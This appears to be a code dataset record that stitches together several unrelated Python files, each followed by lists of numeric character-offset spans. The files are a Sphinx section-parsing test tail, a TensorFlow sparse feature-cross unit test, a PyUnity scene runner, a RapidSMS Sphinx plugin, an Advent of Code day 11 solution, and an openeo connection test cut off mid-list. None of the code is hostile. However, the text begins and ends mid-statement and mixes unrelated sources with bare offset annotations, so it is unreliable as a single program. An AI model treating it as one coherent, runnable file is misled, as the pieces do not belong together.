)
assert sections[0].content.startswith(
"Investigate extinction curve shapes"
)
assert sections[1].headings[-1] == "Keywords"
assert sections[1].header_level == 2
assert sections[1].content.startswith(
"dust extinction, synphot, astroquery, units, photometry, extinction,"
)
assert sections[2].headings[-1] == "Companion Content"
assert sections[2].header_level == 2
assert sections[2].content.startswith("Bessell & Murphy")
assert sections[3].headings[-1] == "Summary"
assert sections[3].header_level == 2
assert sections[3].content.startswith(
"In this tutorial, we will look at some extinction curves from the"
)
assert sections[4].headings[-1] == (
"Analyzing interstellar reddening and calculating synthetic "
"photometry"
)
assert sections[4].header_level == 1
    # Demonstrate finding additional h1 sections on a page (that are supposed
# to be additional h2 sections in a hierarchical sense).
h1_heading = sections[-1].headings[-1]
for sibling in root.itersiblings(tag="div"):
if "section" in sibling.classes:
for s in iter_sphinx_sections(
root_section=sibling,
base_url=color_excess_tutorial.url,
headers=[h1_heading],
header_callback=lambda x: x.rstrip("¶"),
content_callback=lambda x: x.strip(),
):
sections.append(s)
assert sections[5].header_level == 2
assert sections[5].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Introduction",
]
assert sections[6].header_level == 2
assert sections[6].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 1: Investigate Extinction Models",
]
assert sections[7].header_level == 2
assert sections[7].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 2: Deredden a Spectrum",
]
assert sections[8].header_level == 3
assert sections[8].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 3: Calculate Color Excess with synphot",
"Exercise",
]
assert sections[9].header_level == 2
assert sections[9].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 3: Calculate Color Excess with synphot",
]
| [
[
[
149,
160
]
],
[
[
181,
194
],
[
265,
278
]
],
[
[
240,
260
],
[
768,
788
],
[
2541,
2561
]
],
[
[
306,
318
],
[
374,
386
]
],
[
[
325,
350
]
]
] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.layers.sparse_feature_cross."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy
from tensorflow.contrib import layers
from tensorflow.contrib.layers.python.ops import sparse_feature_cross_op
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import sparse_ops
from tensorflow.python.platform import test
class SparseCrossOpTest(test.TestCase):
def test_simple(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1'],
['batch2-FC1-F1', 'batch2-FC1-F2']]),
self._sparse_tensor([['batch1-FC2-F1'],
['batch2-FC2-F1', 'batch2-FC2-F2']])
])
expected_out = self._sparse_tensor([['batch1-FC1-F1_X_batch1-FC2-F1'], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_dense(self):
"""Tests only dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
constant_op.constant([['batch1-FC1-F1', 'batch1-FC1-F2'],
['batch2-FC1-F1', 'batch2-FC1-F2']],
dtypes.string),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1', 'batch1-FC1-F1_X_batch1-FC2-F2',
'batch1-FC1-F2_X_batch1-FC2-F1', 'batch1-FC1-F2_X_batch1-FC2-F2'
], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_mixed_string_sparse(self):
"""Tests mixed type."""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([[11], [333, 55555]]),
self._sparse_tensor([['batch1-FC2-F1'],
['batch2-FC2-F1', 'batch2-FC2-F2']])
])
expected_out = self._sparse_tensor([['11_X_batch1-FC2-F1'], [
'333_X_batch2-FC2-F1', '333_X_batch2-FC2-F2', '55555_X_batch2-FC2-F1',
'55555_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_mixed_string_dense(self):
"""Tests mixed dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
constant_op.constant([[11, 333], [55555, 999999]], dtypes.int64),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor([[
'11_X_batch1-FC2-F1', '11_X_batch1-FC2-F2', '333_X_batch1-FC2-F1',
'333_X_batch1-FC2-F2'
], [
'55555_X_batch2-FC2-F1', '55555_X_batch2-FC2-F2',
'999999_X_batch2-FC2-F1', '999999_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_sparse_cross_dense(self):
"""Tests sparse and dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1'],
['batch2-FC1-F1', 'batch2-FC1-F2']]),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor(
[['batch1-FC1-F1_X_batch1-FC2-F1', 'batch1-FC1-F1_X_batch1-FC2-F2'], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_sparse_input(self):
"""Tests mixed type sparse and dense inputs."""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([[11], [333, 5555]]),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor(
[['11_X_batch1-FC2-F1', '11_X_batch1-FC2-F2'], [
'333_X_batch2-FC2-F1', '333_X_batch2-FC2-F2',
'5555_X_batch2-FC2-F1', '5555_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_permutation_3x3x3(self):
"""Tests 3x3x3 permutation.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor(
[['batch1-FC2-F1', 'batch1-FC2-F2', 'batch1-FC2-F3']]),
self._sparse_tensor(
[['batch1-FC3-F1', 'batch1-FC3-F2', 'batch1-FC3-F3']])
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F3'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_permutation_3x1x2(self):
"""Tests 3x1x2 permutation.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_large_batch(self):
"""Tests with large batch size to force multithreding.
"""
batch_size = 5000
col1 = []
col2 = []
col3 = []
for b in range(batch_size):
col1.append(
['batch%d-FC1-F1' % b, 'batch%d-FC1-F2' % b, 'batch%d-FC1-F3' % b])
col2.append(['batch%d-FC2-F1' % b])
col3.append(['batch%d-FC3-F1' % b, 'batch%d-FC3-F2' % b])
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(col1), self._sparse_tensor(col2),
self._sparse_tensor(col3)
])
col_out = []
for b in range(batch_size):
col_out.append([
'batch%d-FC1-F1_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F1_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b),
'batch%d-FC1-F2_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F2_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b),
'batch%d-FC1-F3_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F3_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b)
])
expected_out = self._sparse_tensor(col_out)
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_one_column_empty(self):
"""Tests when one column is empty.
The crossed tensor should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1', 'batch1-FC1-F2']]),
self._sparse_tensor([], 1),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
])
with self.test_session() as sess:
self._assert_sparse_tensor_empty(sess.run(op))
def test_some_columns_empty(self):
"""Tests when more than one columns are empty.
Cross for the corresponding batch should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1', 'batch1-FC1-F2']], 2),
self._sparse_tensor([['batch1-FC2-F1'], ['batch2-FC2-F1']], 2),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']], 2)
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2'
]], 2)
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_all_columns_empty(self):
"""Tests when all columns are empty.
The crossed tensor should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([]), self._sparse_tensor([]),
self._sparse_tensor([])
])
with self.test_session() as sess:
self._assert_sparse_tensor_empty(sess.run(op))
def test_hashed_output_zero_bucket(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[3735511728867393167]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_zero_bucket_v2(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[1971693436396284976]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
# TODO(sibyl-Aix6ihai): Add benchmark to compare Hashed vs Non-hashed.
def test_hashed_output(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
num_buckets=100)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[74]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_v2(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
num_buckets=100,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[83]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_v1_has_collision(self):
"""Tests the old version of the fingerprint concatenation has collisions.
"""
# The last 10 bits of 359 and 1024+359 are identical.
# As a result, all the crosses collide.
t1 = constant_op.constant([[359], [359 + 1024]])
t2 = constant_op.constant([list(range(10)), list(range(10))])
cross = sparse_feature_cross_op.sparse_feature_cross(
[t2, t1], hashed_output=True, num_buckets=1024)
cross_dense = sparse_ops.sparse_tensor_to_dense(cross)
with session.Session():
values = cross_dense.eval()
self.assertTrue(numpy.equal(values[0], values[1]).all())
def test_hashed_output_v2_has_no_collision(self):
"""Tests the new version of the fingerprint concatenation has no collisions.
"""
    # Although the last 10 bits of 359 and 1024+359 are identical,
    # the crosses should not collide with the new fingerprint concatenation.
t1 = constant_op.constant([[359], [359 + 1024]])
t2 = constant_op.constant([list(range(10)), list(range(10))])
cross = sparse_feature_cross_op.sparse_feature_cross(
[t2, t1],
hashed_output=True,
num_buckets=1024,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
cross_dense = sparse_ops.sparse_tensor_to_dense(cross)
with session.Session():
values = cross_dense.eval()
self.assertTrue(numpy.not_equal(values[0], values[1]).all())
def test_hashed_3x1x2(self):
"""Tests 3x1x2 permutation with hashed output.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
],
hashed_output=True,
num_buckets=1000)
with self.test_session() as sess:
out = sess.run(op)
self.assertEqual(6, len(out.values))
self.assertAllEqual([[0, i] for i in range(6)], out.indices)
self.assertTrue(all(x < 1000 and x >= 0 for x in out.values))
all_values_are_different = len(out.values) == len(set(out.values))
self.assertTrue(all_values_are_different)
def _assert_sparse_tensor_empty(self, sp):
self.assertEquals(0, sp.indices.size)
self.assertEquals(0, sp.values.size)
# TODO(zakaria): check if we can ignore the first dim of the shape.
self.assertEquals(0, sp.dense_shape[1])
def _assert_sparse_tensor_equals(self, sp1, sp2):
self.assertAllEqual(sp1.indices.eval(), sp2.indices)
self.assertAllEqual(sp1.values.eval(), sp2.values)
self.assertAllEqual(sp1.dense_shape.eval(), sp2.dense_shape)
def _sparse_tensor(self, data, batch_size=-1):
"""Generates a SparseTensor.
Args:
data: Should be a list of list of strings or int64. Each item of the outer
list represents a batch. Each item of the batch is a feature of a
specific feature column.
batch_size: optional batch size, especially for cases when data has no
entry for some batches.
Returns:
A SparseTensor.
"""
indices = []
values = []
max_col_count = 0
for batch, batch_ix in zip(data, range(len(data))):
for column, column_ix in zip(batch, range(len(batch))):
indices.append([batch_ix, column_ix])
values.append(column)
max_col_count = max(max_col_count, column_ix + 1)
shape = [batch_size if batch_size != -1 else len(data), max_col_count]
value_type = (dtypes.string if not values or isinstance(values[0], str) else
dtypes.int64)
return sparse_tensor.SparseTensor(
constant_op.constant(indices, dtypes.int64, [len(indices), 2]),
constant_op.constant(values, value_type, [len(indices)]),
constant_op.constant(shape, dtypes.int64))
if __name__ == '__main__':
test.main()
| [
[
[
769,
784
]
],
[
[
808,
816
]
],
[
[
840,
854
]
],
[
[
863,
868
],
[
14912,
14917
],
[
15671,
15676
]
],
[
[
901,
907
],
[
12686,
12692
],
[
14024,
14030
],
[
15482,
15488
]
],
[
[
957,
980
],
[
1385,
1408
],
[
2080,
2103
],
[
3033,
3056
],
[
3639,
3662
],
[
4425,
4448
],
[
5265,
5288
],
[
5965,
5988
],
[
8089,
8112
],
[
9260,
9283
],
[
10223,
10246
],
[
10699,
10722
],
[
11486,
11509
],
[
11815,
11838
],
[
12413,
12436
],
[
13132,
13155
],
[
13726,
13749
],
[
14667,
14690
],
[
15347,
15370
],
[
15816,
15839
]
],
[
[
1018,
1025
],
[
14837,
14844
],
[
15596,
15603
]
],
[
[
1066,
1077
],
[
2135,
2146
],
[
2313,
2324
],
[
3694,
3705
],
[
3768,
3779
],
[
4595,
4606
],
[
5370,
5381
],
[
14545,
14556
],
[
14598,
14609
],
[
15225,
15236
],
[
15278,
15289
],
[
17985,
17996
],
[
18057,
18068
],
[
18123,
18134
]
],
[
[
1118,
1124
],
[
2289,
2295
],
[
2467,
2473
],
[
3745,
3751
],
[
3922,
3928
],
[
4749,
4755
],
[
5524,
5530
],
[
17843,
17849
],
[
17924,
17930
],
[
18015,
18021
],
[
18151,
18157
]
],
[
[
1165,
1178
],
[
17949,
17962
]
],
[
[
1213,
1223
],
[
14787,
14797
],
[
15546,
15556
]
],
[
[
1263,
1267
],
[
1294,
1298
],
[
18197,
18201
]
],
[
[
1276,
1293
]
]
] |
__all__ = ["ChangeScene", "Runner", "WindowRunner", "NonInteractiveRunner", "newRunner"]
from .. import config, render, Logger
from ..events import EventLoopManager, WaitForUpdate, WaitForFixedUpdate, WaitForRender
from ..errors import PyUnityException
import copy
import os
class ChangeScene(Exception):
pass
class Runner:
def __init__(self):
self.scene = None
self.next = None
self.opened = False
def setScene(self, scene):
if self.opened:
raise PyUnityException("Cannot set scene after opening runner")
self.scene = copy.deepcopy(scene)
def setNext(self, scene):
if self.scene is None:
raise PyUnityException("Cannot set next before first scene")
self.next = copy.deepcopy(scene)
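        # Raising ChangeScene is caught in start(), which swaps in self.next and reloads.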
raise ChangeScene
def open(self):
if self.scene is None:
raise PyUnityException("Cannot open runner before setting a scene")
if self.opened:
Logger.Save()
self.opened = True
def setup(self):
pass
def load(self):
if self.scene is None:
raise PyUnityException("Cannot load runner before setting a scene")
Logger.LogLine(Logger.DEBUG, "Starting scene")
self.eventLoopManager = EventLoopManager()
self.eventLoopManager.schedule(self.scene.updateFixed, ups=50, waitFor=WaitForFixedUpdate)
self.eventLoopManager.addLoop(self.scene.startScripts())
def start(self):
while True:
try:
self.eventLoopManager.start()
break
except ChangeScene:
if self.next is None:
raise
self.eventLoopManager.quit()
self.scene.cleanUp()
self.scene = self.next
self.next = None
self.load()
def quit(self):
self.eventLoopManager.quit()
self.scene.cleanUp()
self.scene = None
self.opened = False
class WindowRunner(Runner):
def open(self):
super(WindowRunner, self).open()
os.environ["PYUNITY_GL_CONTEXT"] = "1"
self.window = config.windowProvider(self.scene.name)
# front buffer
self.window.refresh()
render.fillScreen()
# back buffer
self.window.refresh()
render.fillScreen()
def setup(self):
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
Logger.LogLine(Logger.DEBUG, "Compiling objects")
Logger.LogLine(Logger.INFO, "Compiling shaders")
render.compileShaders()
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
Logger.LogLine(Logger.INFO, "Loading skyboxes")
render.compileSkyboxes()
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
def load(self):
super(WindowRunner, self).load()
self.eventLoopManager.schedule(
self.scene.updateScripts, self.window.updateFunc,
ups=config.fps, waitFor=WaitForUpdate)
self.eventLoopManager.schedule(
self.window.refresh, self.scene.Render,
main=True, waitFor=WaitForRender)
if self.scene.mainCamera is not None:
self.window.setResize(self.scene.mainCamera.Resize)
self.scene.startOpenGL()
self.scene.startLoop()
def start(self):
super(WindowRunner, self).start()
def quit(self):
super(WindowRunner, self).quit()
del self.window
del os.environ["PYUNITY_GL_CONTEXT"]
render.resetShaders()
Logger.LogLine(Logger.INFO, "Reset shaders")
render.resetSkyboxes()
Logger.LogLine(Logger.INFO, "Reset skyboxes")
class NonInteractiveRunner(Runner):
def load(self):
super(NonInteractiveRunner, self).load()
self.eventLoopManager.schedule(
self.scene.updateScripts,
ups=config.fps, waitFor=WaitForUpdate)
self.scene.startLoop()
def newRunner():
if os.environ["PYUNITY_INTERACTIVE"] == "1":
return WindowRunner()
else:
return NonInteractiveRunner()
| [
[
[
0,
7
]
],
[
[
105,
111
],
[
2163,
2169
],
[
2983,
2989
],
[
3894,
3900
]
],
[
[
113,
119
],
[
2263,
2269
],
[
2343,
2349
],
[
2569,
2575
],
[
2718,
2724
],
[
3534,
3540
],
[
3617,
3623
]
],
[
[
121,
127
],
[
978,
984
],
[
1194,
1200
],
[
1209,
1215
],
[
2393,
2399
],
[
2411,
2417
],
[
2424,
2430
],
[
2453,
2459
],
[
2468,
2474
],
[
2512,
2518
],
[
2527,
2533
],
[
2601,
2607
],
[
2619,
2625
],
[
2632,
2638
],
[
2662,
2668
],
[
2677,
2683
],
[
2751,
2757
],
[
2769,
2775
],
[
2782,
2788
],
[
3564,
3570
],
[
3579,
3585
],
[
3648,
3654
],
[
3663,
3669
]
],
[
[
149,
165
],
[
1273,
1289
]
],
[
[
167,
180
],
[
3003,
3016
],
[
3914,
3927
]
],
[
[
182,
200
],
[
1371,
1389
]
],
[
[
202,
215
],
[
3141,
3154
]
],
[
[
237,
253
],
[
508,
524
],
[
688,
704
],
[
880,
896
],
[
1124,
1140
]
],
[
[
261,
265
],
[
587,
591
],
[
763,
767
]
],
[
[
273,
275
],
[
2101,
2103
],
[
3493,
3495
],
[
3985,
3987
]
],
[
[
283,
294
],
[
798,
809
],
[
1602,
1613
]
],
[
[
323,
329
],
[
2023,
2029
],
[
3722,
3728
]
],
[
[
2010,
2022
],
[
2066,
2078
],
[
2838,
2850
],
[
3366,
3378
],
[
3429,
3441
],
[
4042,
4054
]
],
[
[
3701,
3721
],
[
3765,
3785
],
[
4082,
4102
]
],
[
[
3965,
3974
]
]
] |
"""
Sphinx plugins for RapidSMS documentation.
"""
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
try:
from django.utils import simplejson as json
except ImportError:
json = None
from sphinx import addnodes, roles
from docutils.parsers.rst import Directive
def setup(app):
app.add_crossref_type(
directivename = "setting",
rolename = "setting",
indextemplate = "pair: %s; setting",
)
app.add_crossref_type(
directivename = "templatetag",
rolename = "ttag",
indextemplate = "pair: %s; template tag"
)
app.add_crossref_type(
directivename = "templatefilter",
rolename = "tfilter",
indextemplate = "pair: %s; template filter"
)
app.add_crossref_type(
directivename = "router",
rolename = "router",
indextemplate = "pair: %s; router",
)
app.add_config_value('rapidsms_next_version', '0.0', True)
app.add_directive('versionadded', VersionDirective)
app.add_directive('versionchanged', VersionDirective)
class VersionDirective(Directive):
has_content = True
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
option_spec = {}
def run(self):
env = self.state.document.settings.env
arg0 = self.arguments[0]
is_nextversion = env.config.rapidsms_next_version == arg0
ret = []
node = addnodes.versionmodified()
ret.append(node)
if not is_nextversion:
if len(self.arguments) == 1:
linktext = 'Please, see the release notes </releases/%s>' % (arg0)
xrefs = roles.XRefRole()('doc', linktext, linktext,
self.lineno, self.state)
node.extend(xrefs[0])
node['version'] = arg0
else:
node['version'] = "Development version"
node['type'] = self.name
if len(self.arguments) == 2:
inodes, messages = self.state.inline_text(self.arguments[1],
self.lineno+1)
node.extend(inodes)
if self.content:
self.state.nested_parse(self.content, self.content_offset,
node)
ret = ret + messages
env.note_versionchange(node['type'], node['version'], node,
self.lineno)
return ret
| [
[
[
68,
72
]
],
[
[
117,
135
]
],
[
[
210,
228
]
],
[
[
269,
273
]
],
[
[
301,
309
],
[
1533,
1541
]
],
[
[
311,
316
],
[
1764,
1769
]
],
[
[
350,
359
],
[
1188,
1197
]
],
[
[
366,
371
]
],
[
[
1171,
1187
],
[
1087,
1103
],
[
1145,
1161
]
]
] |
#!/usr/bin/env python3
# pylint: disable=unused-import
import collections
import functools
import io
import itertools
import operator as op
import re
import timeit
import numpy as np
import aocd
YEAR = 2021
DAY = 11
def step(grid):
grid += 1
flash = np.zeros_like(grid, dtype=bool)
while np.any(grid[~flash] > 9):
new_flash = (grid > 9) ^ flash
grid[:-1, :-1] += new_flash[1:, 1:]
grid[:-1, :] += new_flash[1:, :]
grid[:-1, 1:] += new_flash[1:, :-1]
grid[:, :-1] += new_flash[:, 1:]
grid[:, 1:] += new_flash[:, :-1]
grid[1:, :-1] += new_flash[:-1, 1:]
grid[1:, :] += new_flash[:-1, :]
grid[1:, 1:] += new_flash[:-1, :-1]
flash |= new_flash
grid[flash] = 0
return flash
def main():
data = """5483143223
2745854711
5264556173
6141336146
6357385478
4167524645
2176841721
6882881134
4846848554
5283751526"""
data = aocd.get_data(day=DAY, year=YEAR)
inlist = np.array([list(map(int, l)) for l in data.split('\n')])
print(inlist)
grid = inlist.copy()
num_flashes = 0
for i in range(100):
num_flashes += np.sum(step(grid))
print(num_flashes)
answer = num_flashes
aocd.submit(answer, part='a', day=DAY, year=YEAR)
grid = inlist.copy()
for i in itertools.count(1):
flash = step(grid)
if np.all(flash):
answer = i
break
print(answer)
aocd.submit(answer, part='b', day=DAY, year=YEAR)
if __name__ == '__main__':
main()
| [
[
[
63,
74
]
],
[
[
82,
91
]
],
[
[
99,
101
]
],
[
[
109,
118
],
[
1302,
1311
]
],
[
[
126,
140
]
],
[
[
148,
150
]
],
[
[
158,
164
]
],
[
[
173,
184
],
[
263,
265
],
[
305,
307
],
[
973,
975
],
[
1141,
1143
],
[
1360,
1362
]
],
[
[
192,
196
],
[
926,
930
],
[
1213,
1217
],
[
1438,
1442
]
],
[
[
198,
202
],
[
954,
958
],
[
1257,
1261
],
[
1482,
1486
]
],
[
[
210,
213
],
[
944,
947
],
[
1247,
1250
],
[
1472,
1475
]
],
[
[
225,
229
],
[
1148,
1152
],
[
1338,
1342
]
],
[
[
780,
784
],
[
1521,
1525
]
]
] |
import unittest.mock as mock
import pytest
import requests_mock
from openeo.rest.auth.auth import NullAuth, BearerAuth
from openeo.rest.connection import Connection, RestApiConnection, connect, OpenEoApiError
API_URL = "https://oeo.net/"
@pytest.mark.parametrize(
["base", "paths", "expected_path"],
[
# Simple
("https://oeo.net", ["foo", "/foo"], "https://oeo.net/foo"),
("https://oeo.net/", ["foo", "/foo"], "https://oeo.net/foo"),
# With trailing slash
("https://oeo.net", ["foo/", "/foo/"], "https://oeo.net/foo/"),
("https://oeo.net/", ["foo/", "/foo/"], "https://oeo.net/foo/"),
# Deeper
